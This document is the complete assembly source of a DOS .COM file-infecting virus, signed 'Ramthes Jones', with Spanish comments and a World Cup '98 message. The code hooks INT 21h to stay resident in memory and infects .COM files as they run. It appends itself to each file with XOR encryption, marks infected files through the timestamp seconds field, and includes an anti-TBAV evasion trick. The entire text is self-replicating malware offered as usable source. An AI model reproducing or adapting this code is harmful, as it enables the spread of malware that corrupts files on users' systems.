;****************************************************************************** ;****************************************************************************** ;**** Virus: .COM /noTBAV **** ;**** By: Ramthes Jones **** ;****************************************************************************** ;****************************************************************************** CODE SEGMENT ASSUME CS:CODE, DS:CODE, ES:CODE, SS:CODE ORG 0100h DELTA EQU (TWO - ONE) START: JMP VIR_START NOP MOV AH,09h MOV DX,OFFSET MSG PUSH CS POP DS INT 21h INT 20h MSG DB 0Ah,0Dh,'Virus Mr-X activado!!!',0Ah,0Dh DB 'Por favor no ejecute ningun archivo. Je, je, je...',0Ah,0Dh,'$' VIR_START: ONE LABEL BYTE MOV BX,015Dh PUSH BX MOV SI,(OFFSET BEGIN - OFFSET ONE) - 1; Conocido ADD SI,BX MOV CX,(OFFSET TWO - OFFSET BEGIN) + 1; Conocido MOV DX,0FFCDh ; FFCD = INT FFh CLI BUCLE: MOV AH,[SI] XOR AH,00h DB 06 DUP (90h) MOV [bx+30],DX INTFFh LABEL WORD MOV [SI],AH MOV [bx+30],2488h INC SI LOOP BUCLE STI JMP ATBV JODER: MOV AH,4Ch INT 21h ATBV: MOV AH,30h INT 21h BEGIN: MOV AX,0ACACh INT 21h CMP AX,0CACAh JE RUN_COM JMP STAY_IN_MEMO RUN_COM: PUSH CS PUSH CS POP DS POP ES POP BX MOV DI,100h LEA SI,[(NORMAL - OFFSET ONE) + BX] MOVSW MOVSB PUSH CS PUSH 0100h RETF STAY_IN_MEMO: MOV AH,4Ah XOR BX,BX INT 21h MOV AH,4Ah MOV BX,0FFFFh INT 21h SUB BX,61h ;101h MOV AH,4Ah INT 21h MOV AH,48h MOV BX,60h ;100h INT 21h MOV ES,AX PUSH ES DEC AX MOV ES,AX MOV ES:WORD PTR [0001h], 0008h POP ES PUSH CS POP DS POP SI PUSH SI XOR DI,DI MOV CX,DELTA CLD REP MOVSB PUSH ES POP DS MOV AX,3521h INT 21h POP SI PUSH SI MOV DS:[INT21IP - OFFSET ONE],BX MOV DS:[INT21CS - OFFSET ONE],ES MOV AX,2521h MOV DX,(OFFSET HOOK_21 - OFFSET ONE) INT 21h JMP RUN_COM HOOK_21 PROC FAR PUSH DS PUSHF PUSH AX PUSH BX PUSH CX PUSH DX PUSH SI PUSH DI PUSH DS PUSH ES CMP AX,4B00h JE INFECT_COM CMP AX,0ACACh JE GIVE_MARK JMP FIN GIVE_MARK: POP ES POP DS POP DI POP SI POP DX POP CX POP BX POP AX POPF POP DS MOV AX,0CACAh IRET INFECT_COM: PUSH AX PUSH BX PUSH DX PUSH DS PUSH ES MOV AX, CS MOV DS, AX MOV AX,3524h PUSHF CALL DWORD PTR DS:[INT21IP - OFFSET ONE] MOV DS:[INT24IP - OFFSET ONE],BX MOV DS:[INT24CS - OFFSET ONE],ES MOV AX,2524h MOV DX,(OFFSET HOOK_24 - OFFSET ONE) PUSHF CALL DWORD PTR DS:[INT21IP - OFFSET ONE] POP ES POP DS POP DX POP BX POP AX PUSH DX MOV AX,4300h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV CS:[(ATRIBUTOS - OFFSET ONE)],CX MOV AX,4301h MOV CX,20h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] JC FINAL_1 MOV AX,3D02h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] PUSH AX POP BX MOV AH,3Fh MOV CX,2 PUSH CS POP DS MOV DX,(OFFSET NORMAL - OFFSET ONE) PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] XOR SI,SI mov ax,cs:(normal - offset one)[si] cmp ax,'ZM' je final_1 jmp conti FINAL_1: JMP FINAL CONTI: MOV AX,5700h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV CS:[(HORA - OFFSET ONE)],CX MOV CS:[(FECHA - OFFSET ONE)],DX AND CL,00011111b ; Esto es lo correcto para comprobar CMP CL,00001101b ; si los segundos son 26 JE FINAL_1 XOR AL,AL CALL F_42h MOV AH,3Fh MOV CX,3 PUSH CS POP DS MOV DX,(OFFSET NORMAL - OFFSET ONE) PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AL,02h CALL F_42h PUSH AX SUB AX,3 MOV SI,1 MOV CS:(BUFFER - OFFSET ONE)[SI],AL INC SI MOV CS:(BUFFER - OFFSET ONE)[SI],AH PUSH BX MOV AH,48h MOV BX,150h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV ES,AX POP BX PUSH CS POP DS XOR SI,SI MOV DI,SI MOV CX,OFFSET TWO - OFFSET ONE CLD REP MOVSB PUSH ES POP DS POP AX ; Calculo INC AH ; la direccion XOR SI,SI ; donde va a MOV [SI + 1],AL ; comenzar el MOV [SI + 2],AH ; arch infectado MOV AH,2Ch PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV [SI+20],DL MOV CX,(OFFSET TWO - OFFSET BEGIN) + 1 MOV SI,(OFFSET BEGIN - OFFSET ONE) - 1 ENCRIPTO: XOR ES:[SI],DL INC SI LOOP ENCRIPTO MOV AH,40h MOV CX,DELTA XOR DX,DX PUSH ES POP DS PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] JC FINAL MOV AH,49h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] XOR AL,AL CALL F_42h MOV AH,40h MOV CX,3 MOV DX,(OFFSET BUFFER - OFFSET ONE) PUSH CS POP DS PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AX,5701h MOV CX,CS:[(HORA - OFFSET ONE)] AND CL,11100000b OR CL,00001101b MOV DX,CS:[(FECHA - OFFSET ONE)] PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] FINAL: MOV AH,3Eh PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AX,4301h MOV CX,CS:[(ATRIBUTOS - OFFSET ONE)] POP DX PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AX,2524h MOV DX,CS:[INT24IP - OFFSET ONE] MOV DS,CS:[INT24CS - OFFSET ONE] PUSHF CALL DWORD PTR CS:[INT21IP-OFFSET ONE] FIN: POP ES POP DS POP DI POP SI POP DX POP CX POP BX POP AX POPF POP DS JMP DWORD PTR CS:[(INT21IP - OFFSET ONE)] F_42h PROC MOV AH,42h CWD MOV CX,DX PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] RET F_42h ENDP HOOK_21 ENDP HOOK_24 PROC XOR AL,AL IRET HOOK_24 ENDP INT21IP DW 0 INT21CS DW 0 INT24IP DW 0 INT24CS DW 0 INT17IP DW 0 INT17CS DW 0 ATRIBUTOS DW 0 HORA DW 0 FECHA DW 0 BUFFER DB 3 DUP(0E9h) NORMAL DB 3 DUP(90h) HIDDEN_MSG DB "Ramthes. World Cup'98: ARGENTINA!!" TWO LABEL BYTE CODE ENDS END START